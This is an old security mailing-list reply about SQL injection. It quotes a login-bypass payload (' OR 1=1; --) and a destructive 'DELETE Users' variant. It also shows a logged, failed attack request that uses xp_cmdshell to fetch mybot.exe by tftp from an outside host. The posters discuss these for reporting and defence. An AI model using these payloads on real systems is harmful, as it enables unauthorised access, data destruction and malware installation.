Re: SQL injection

"Francesco" <francesco@blackcoil.com> writes:

> I have just discovered that I can successfully inject the following SQL:
>
> ' OR 1=1; --
>
> into the Username field of a logon form on a "secure" site in my
> corporate network (Windows 2000, SQL 7.0).  When I do this, leaving the
> password field blank, I am logged into the system as the first user in
> the "Users" table in the DB which is being authenticated against.  LOL.
>
> If I can get that far, can't I theoretically:
>
> ' OR 1=1; DELETE Users; --
>
> or something similar?  Couldn't I EXEC some system sprocs this way too? 
> How much damage/rooting can be done here?  I need to present a detailed
> report to the admins.

Captured here - unsuccessful incidentally - an attack from 24.1.xx.yy

GET 
/foo.asp?bar=baz';%20exec%20master..xp_cmdshell%20'tftp%20-i%2024.1.xx.yy%20get%20mybot.exe%20C:%5Carcld.exe'--
 HTTP/1.1

(The '..' between 'master' and 'xp_cmdshell' is 2E 2E hex.)

I don't know what mybot.exe was, but it's probably not good :)

cheers,
 Jamie
-- 
James Riden / j.riden@massey.ac.nz / Systems Security Engineer
GPG public key available at: http://www.massey.ac.nz/~jriden/
This post does not necessarily represent the views of my employer.